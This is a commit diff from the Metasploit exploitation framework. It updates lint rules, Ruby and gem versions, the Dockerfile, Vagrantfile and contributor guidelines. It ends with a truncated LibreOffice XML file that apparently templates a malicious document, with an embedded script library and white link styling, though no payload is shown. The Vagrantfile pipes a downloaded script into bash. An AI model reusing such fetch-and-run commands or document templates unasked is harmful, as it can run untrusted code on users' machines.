Land #11969 , deprecate db_rebuild_cache command

Land #12080 , system vs. popen for unknown_command
automatic module_metadata_base.json update
2019-07-11 11:02:17 -05:00 · 2019-07-10 21:24:42 -05:00 · 2019-07-10 16:04:18 -07:00 · 2019-07-10 17:43:18 -05:00 · 2019-07-10 17:41:54 -05:00 · 2019-07-10 17:40:49 -05:00
636 changed files with 163534 additions and 6280 deletions
@@ -45,6 +45,10 @@ Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false

+Naming/VariableNumber:
+  Description: 'To make it easier to use reference code, disable this cop'
+  Enabled: false
+
 Style/NumericPredicate:
  Description: 'This adds no efficiency nor space saving'
  Enabled: false
@@ -55,14 +59,18 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

-Layout/IndentHeredoc:
+Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
-  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+  Description: 'Almost all module metadata have space in brackets'

 Style/GuardClause:
  Enabled: false
  Description: 'This often introduces bugs in tested code'

+Style/EmptyLiteral:
+  Enabled: false
+  Description: 'This looks awkward when you mix empty and non-empty literals'
+
 Style/NegatedIf:
  Enabled: false
  Description: 'This often introduces bugs in tested code'
@@ -72,9 +80,16 @@ Style/ConditionalAssignment:
  Description: 'This is confusing for folks coming from other languages'

 Style/Encoding:
-  Enabled: true
  Description: 'We prefer binary to UTF-8.'
-  EnforcedStyle: 'when_needed'
+  Enabled: false
+
+Style/ParenthesesAroundCondition:
+  Enabled: false
+  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
+
+Style/TrailingCommaInArrayLiteral:
+  Enabled: false
+  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'

 Metrics/LineLength:
  Description: >-
@@ -83,6 +98,13 @@ Metrics/LineLength:
  Enabled: true
  Max: 180

+Metrics/BlockLength:
+  Enabled: true
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
+
 Metrics/MethodLength:
  Enabled: true
  Description: >-
@@ -90,10 +112,10 @@ Metrics/MethodLength:
                  often exceed 200 lines.
  Max: 300

-# Basically everything in metasploit needs binary encoding, not UTF-8.
-# Disable this here and enforce it through msftidy
-Style/Encoding:
-  Enabled: false
+Naming/UncommunicativeMethodParamName:
+  Enabled: true
+  Description: 'Whoever made this requirement never looked at crypto methods, IV'
+  MinNameLength: 2

 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
@@ -104,11 +126,31 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

+Layout/AlignHash:
+  Enabled: false
+  Description: 'aligning info hashes to match these rules is almost impossible to get right'
+
+Layout/EmptyLines:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundClassBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundMethodBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
 Layout/AlignParameters:
  Enabled: true
  EnforcedStyle: 'with_fixed_indentation'
  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

+Style/For:
+  Enabled: false
+  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
+
 Style/StringLiterals:
  Enabled: false
  Description: 'Single vs double quote fights are largely unproductive.'
@@ -1 +1 @@
-2.6.1
+2.6.2
@@ -11,10 +11,8 @@ addons:
      - graphviz
 language: ruby
 rvm:
-  - '2.3.8'
-  - '2.4.5'
-  - '2.5.3'
-  - '2.6.1'
+  - '2.5.5'
+  - '2.6.2'

 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -25,11 +23,6 @@ env:

 matrix:
  fast_finish: true
-  exclude:
-  - rvm: '2.3.8'
-    env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
-  - rvm: '2.4.5'
-    env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'

 jobs:
  # build docker image
@@ -20,12 +20,15 @@ it into Metasploit's master branch.  If you do not care to follow these rules, y
 * **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** follow the [50/72 rule] for Git commit messages.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
-  history of your pull request.  See [PR#8000] for an example of losing commit history as soon as
-  you update your own master branch.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.
+  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
+  allows for a location for more commits to be offered without mingling with other contributor changes,
+  and allows contributors to make progress while a PR is still being reviewed.
+

 ### Pull Requests

+* **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
@@ -84,7 +87,7 @@ curve, so keep it up!
 [Rubocop]:https://rubygems.org/search?query=rubocop
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
-[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
+[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
@@ -1,4 +1,4 @@
-FROM ruby:2.6.1-alpine3.9 AS builder
+FROM ruby:2.6.2-alpine3.9 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -29,7 +29,6 @@ RUN apk add --no-cache \
      git \
    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
    && gem update --system \
-    && gem install bundler \
    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
@@ -37,7 +36,7 @@ RUN apk add --no-cache \
    && chmod -R a+r /usr/local/bundle


-FROM ruby:2.6.1-alpine3.9
+FROM ruby:2.6.2-alpine3.9
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -1,10 +1,13 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.10)
+    metasploit-framework (5.0.36)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
+      aws-sdk-ec2
+      aws-sdk-iam
+      aws-sdk-s3
      backports
      bcrypt
      bcrypt_pbkdf
@@ -21,9 +24,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.3.62)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 0.5.7)
+      metasploit-payloads (= 1.3.70)
+      metasploit_data_models (= 3.0.10)
+      metasploit_payloads-mettle (= 0.5.16)
      mqtt
      msgpack
      nessus_rest
@@ -56,7 +59,7 @@ PATH
      rex-random_identifier
      rex-registry
      rex-rop_builder
-      rex-socket
+      rex-socket (= 0.1.17)
      rex-sslscan
      rex-struct2
      rex-text
@@ -80,40 +83,62 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.0.3)
-    actionpack (4.2.11)
-      actionview (= 4.2.11)
-      activesupport (= 4.2.11)
+    actionpack (4.2.11.1)
+      actionview (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11)
-      activesupport (= 4.2.11)
+    actionview (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11)
-      activesupport (= 4.2.11)
+    activemodel (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
-    activerecord (4.2.11)
-      activemodel (= 4.2.11)
-      activesupport (= 4.2.11)
+    activerecord (4.2.11.1)
+      activemodel (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      arel (~> 6.0)
-    activesupport (4.2.11)
+    activesupport (4.2.11.1)
      i18n (~> 0.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.5.2)
+    addressable (2.6.0)
      public_suffix (>= 2.0.2, < 4.0)
    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.8.0)
-      activerecord (>= 3.1.0, < 6)
-    backports (3.12.0)
-    bcrypt (3.1.12)
-    bcrypt_pbkdf (1.0.0)
+    arel-helpers (2.9.1)
+      activerecord (>= 3.1.0, < 7)
+    aws-eventstream (1.0.3)
+    aws-partitions (1.184.0)
+    aws-sdk-core (3.59.0)
+      aws-eventstream (~> 1.0, >= 1.0.2)
+      aws-partitions (~> 1.0)
+      aws-sigv4 (~> 1.1)
+      jmespath (~> 1.0)
+    aws-sdk-ec2 (1.99.0)
+      aws-sdk-core (~> 3, >= 3.58.0)
+      aws-sigv4 (~> 1.1)
+    aws-sdk-iam (1.27.0)
+      aws-sdk-core (~> 3, >= 3.58.0)
+      aws-sigv4 (~> 1.1)
+    aws-sdk-kms (1.23.0)
+      aws-sdk-core (~> 3, >= 3.58.0)
+      aws-sigv4 (~> 1.1)
+    aws-sdk-s3 (1.45.0)
+      aws-sdk-core (~> 3, >= 3.58.0)
+      aws-sdk-kms (~> 1)
+      aws-sigv4 (~> 1.1)
+    aws-sigv4 (1.1.0)
+      aws-eventstream (~> 1.0, >= 1.0.2)
+    backports (3.15.0)
+    bcrypt (3.1.13)
+    bcrypt_pbkdf (1.0.1)
    bindata (2.4.4)
    bit-struct (0.16)
    builder (3.2.3)
@@ -125,7 +150,7 @@ GEM
    diff-lcs (1.3)
    dnsruby (1.61.2)
      addressable (~> 2.5)
-    docile (1.3.1)
+    docile (1.3.2)
    ed25519 (1.2.4)
    em-http-request (1.1.5)
      addressable (>= 2.3.4)
@@ -139,10 +164,10 @@ GEM
    eventmachine (1.2.7)
    factory_bot (5.0.2)
      activesupport (>= 4.2.0)
-    factory_bot_rails (5.0.1)
-      factory_bot (~> 5.0.0)
+    factory_bot_rails (5.0.2)
+      factory_bot (~> 5.0.2)
      railties (>= 4.2.0)
-    faker (1.9.3)
+    faker (1.9.5)
      i18n (>= 0.7)
    faraday (0.15.4)
      multipart-post (>= 1.2, < 3)
@@ -152,13 +177,14 @@ GEM
    http_parser.rb (0.6.0)
    i18n (0.9.5)
      concurrent-ruby (~> 1.0)
+    jmespath (1.4.0)
    jsobfu (0.4.2)
      rkelly-remix
    json (2.2.0)
    loofah (2.2.3)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    metasm (1.0.3)
+    metasm (1.0.4)
    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -177,8 +203,8 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.62)
-    metasploit_data_models (3.0.5)
+    metasploit-payloads (1.3.70)
+    metasploit_data_models (3.0.10)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
@@ -188,20 +214,20 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.7)
+    metasploit_payloads-mettle (0.5.16)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
    minitest (5.11.3)
    mqtt (0.5.0)
-    msgpack (1.2.6)
-    multipart-post (2.0.0)
+    msgpack (1.3.0)
+    multipart-post (2.1.1)
    nessus_rest (0.1.6)
-    net-ssh (5.1.0)
+    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.1)
+    nokogiri (1.10.3)
      mini_portile2 (~> 2.4.0)
-    octokit (4.13.0)
+    octokit (4.14.0)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
@@ -224,7 +250,7 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (3.0.3)
+    public_suffix (3.1.1)
    rack (1.6.11)
    rack-protection (1.5.5)
      rack
@@ -238,14 +264,14 @@ GEM
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.4)
      loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.11)
-      actionpack (= 4.2.11)
-      activesupport (= 4.2.11)
+    railties (4.2.11.1)
+      actionpack (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
    rake (12.3.2)
    rb-readline (0.5.5)
-    recog (2.2.0)
+    recog (2.3.2)
      nokogiri
    redcarpet (3.4.0)
    rex-arch (0.1.13)
@@ -261,7 +287,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.20)
+    rex-exploitation (0.1.21)
      jsobfu
      metasm
      rex-arch
@@ -274,7 +300,7 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.79)
+    rex-powershell (0.1.82)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.4)
@@ -299,12 +325,12 @@ GEM
      rspec-core (~> 3.8.0)
      rspec-expectations (~> 3.8.0)
      rspec-mocks (~> 3.8.0)
-    rspec-core (3.8.0)
+    rspec-core (3.8.2)
      rspec-support (~> 3.8.0)
-    rspec-expectations (3.8.2)
+    rspec-expectations (3.8.4)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.8.0)
-    rspec-mocks (3.8.0)
+    rspec-mocks (3.8.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.8.0)
    rspec-rails (3.8.2)
@@ -317,19 +343,19 @@ GEM
      rspec-support (~> 3.8.0)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.8.0)
+    rspec-support (3.8.2)
    ruby-macho (2.2.0)
    ruby-rc4 (0.1.5)
-    ruby_smb (1.0.5)
+    ruby_smb (1.1.0)
      bindata
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (1.2.2)
-    sawyer (0.8.1)
-      addressable (>= 2.3.5, < 2.6)
-      faraday (~> 0.8, < 1.0)
-    simplecov (0.16.1)
+    rubyzip (1.2.3)
+    sawyer (0.8.2)
+      addressable (>= 2.3.5)
+      faraday (> 0.8, < 2.0)
+    simplecov (0.17.0)
      docile (~> 1.1)
      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
@@ -352,7 +378,7 @@ GEM
    ttfunk (1.5.1)
    tzinfo (1.2.5)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2018.9)
+    tzinfo-data (1.2019.2)
      tzinfo (>= 1.0.0)
    warden (1.2.7)
      rack (>= 1.0)
@@ -361,7 +387,7 @@ GEM
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.18)
+    yard (0.9.20)

 PLATFORMS
  ruby
@@ -1,17 +1,25 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.0.3, MIT
-actionpack, 4.2.11, MIT
-actionview, 4.2.11, MIT
-activemodel, 4.2.11, MIT
-activerecord, 4.2.11, MIT
-activesupport, 4.2.11, MIT
-addressable, 2.5.2, "Apache 2.0"
+actionpack, 4.2.11.1, MIT
+actionview, 4.2.11.1, MIT
+activemodel, 4.2.11.1, MIT
+activerecord, 4.2.11.1, MIT
+activesupport, 4.2.11.1, MIT
+addressable, 2.6.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.8.0, MIT
-backports, 3.12.0, MIT
-bcrypt, 3.1.12, MIT
-bcrypt_pbkdf, 1.0.0, MIT
+arel-helpers, 2.9.1, MIT
+aws-eventstream, 1.0.3, "Apache 2.0"
+aws-partitions, 1.184.0, "Apache 2.0"
+aws-sdk-core, 3.59.0, "Apache 2.0"
+aws-sdk-ec2, 1.99.0, "Apache 2.0"
+aws-sdk-iam, 1.27.0, "Apache 2.0"
+aws-sdk-kms, 1.23.0, "Apache 2.0"
+aws-sdk-s3, 1.45.0, "Apache 2.0"
+aws-sigv4, 1.1.0, "Apache 2.0"
+backports, 3.15.0, MIT
+bcrypt, 3.1.13, MIT
+bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.3, MIT
@@ -23,44 +31,45 @@ crass, 1.0.4, MIT
 daemons, 1.3.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.2, "Apache 2.0"
-docile, 1.3.1, MIT
+docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
 em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 5.0.2, MIT
-factory_bot_rails, 5.0.1, MIT
-faker, 1.9.3, MIT
+factory_bot_rails, 5.0.2, MIT
+faker, 1.9.5, MIT
 faraday, 0.15.4, MIT
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
 http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
+jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.2.0, ruby
 loofah, 2.2.3, MIT
-metasm, 1.0.3, LGPL
+metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.3, "New BSD"
-metasploit-framework, 5.0.10, "New BSD"
+metasploit-framework, 5.0.36, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.62, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 3.0.5, "New BSD"
-metasploit_payloads-mettle, 0.5.7, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.70, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 3.0.10, "New BSD"
+metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.11.3, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.2.6, "Apache 2.0"
-multipart-post, 2.0.0, MIT
+msgpack, 1.3.0, "Apache 2.0"
+multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 5.1.0, MIT
+net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.1, MIT
-octokit, 4.13.0, MIT
+nokogiri, 1.10.3, MIT
+octokit, 4.14.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
@@ -71,28 +80,28 @@ pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 3.0.3, MIT
+public_suffix, 3.1.1, MIT
 rack, 1.6.11, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.0.4, MIT
-railties, 4.2.11, MIT
+railties, 4.2.11.1, MIT
 rake, 12.3.2, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.2.0, unknown
+recog, 2.3.2, unknown
 redcarpet, 3.4.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.20, "New BSD"
+rex-exploitation, 0.1.21, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.79, "New BSD"
+rex-powershell, 0.1.82, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
@@ -103,19 +112,19 @@ rex-text, 0.2.21, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.8.0, MIT
-rspec-core, 3.8.0, MIT
-rspec-expectations, 3.8.2, MIT
-rspec-mocks, 3.8.0, MIT
+rspec-core, 3.8.2, MIT
+rspec-expectations, 3.8.4, MIT
+rspec-mocks, 3.8.1, MIT
 rspec-rails, 3.8.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.8.0, MIT
+rspec-support, 3.8.2, MIT
 ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
-ruby_smb, 1.0.5, "New BSD"
+ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 1.2.2, "Simplified BSD"
-sawyer, 0.8.1, MIT
-simplecov, 0.16.1, MIT
+rubyzip, 1.2.3, "Simplified BSD"
+sawyer, 0.8.2, MIT
+simplecov, 0.17.0, MIT
 simplecov-html, 0.10.2, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
@@ -128,9 +137,9 @@ tilt, 2.0.9, MIT
 timecop, 0.9.1, MIT
 ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.5, MIT
-tzinfo-data, 1.2018.9, MIT
+tzinfo-data, 1.2019.2, MIT
 warden, 1.2.7, MIT
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.18, MIT
+yard, 0.9.20, MIT
@@ -31,7 +31,6 @@ Vagrant.configure(2) do |config|
  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
    "mkdir -p ~/.msf4",
  ].each do |step|
@@ -22,11 +22,26 @@ unless ENV['BUNDLE_GEMFILE']
  end
 end

+# Remove bigdecimal warning - start
+# https://github.com/ruby/bigdecimal/pull/115
+# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
+# TODO: remove when upgrading from rails 4.x
+require 'bigdecimal'
+
+def BigDecimal.new(*args, **kwargs)
+  return BigDecimal(*args) if kwargs.empty?
+  BigDecimal(*args, **kwargs)
+end
+# Remove bigdecimal warning - end
+
 begin
  require 'bundler/setup'
-rescue LoadError
-  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
-  $stderr.puts "    $ gem install bundler"
+rescue LoadError => e
+  $stderr.puts "[*] Bundler failed to load and returned this error:"
+  $stderr.puts
+  $stderr.puts "   '#{e}'"
+  $stderr.puts
+  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
  exit(1)
 end

@@ -0,0 +1,46 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
+ <office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta>
+ <office:scripts>
+  <office:script script:language="ooo:Basic">
+   <ooo:libraries xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink">
+    <ooo:library-embedded ooo:name="Standard"/>
+   </ooo:libraries>
+  </office:script>
+ </office:scripts>
+ <office:styles>
+  <style:default-style style:family="graphic">
+   <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
+   <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
+    <style:tab-stops/>
+   </style:paragraph-properties>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
+  </style:default-style>
+  <style:default-style style:family="paragraph">
+   <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+  </style:default-style>
+  <style:default-style style:family="table">
+   <style:table-properties table:border-model="collapsing"/>
+  </style:default-style>
+  <style:default-style style:family="table-row">
+   <style:table-row-properties fo:keep-together="auto"/>
+  </style:default-style>
+  <style:style style:name="Standard" style:family="paragraph" style:class="text"/>
+  <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
+   <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/>
+  </style:style>
+  <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
+   <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+  </style:style>
+ </office:styles>
+ <office:master-styles>
+  <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
+ </office:master-styles>
+ <office:body>
+  <office:text>
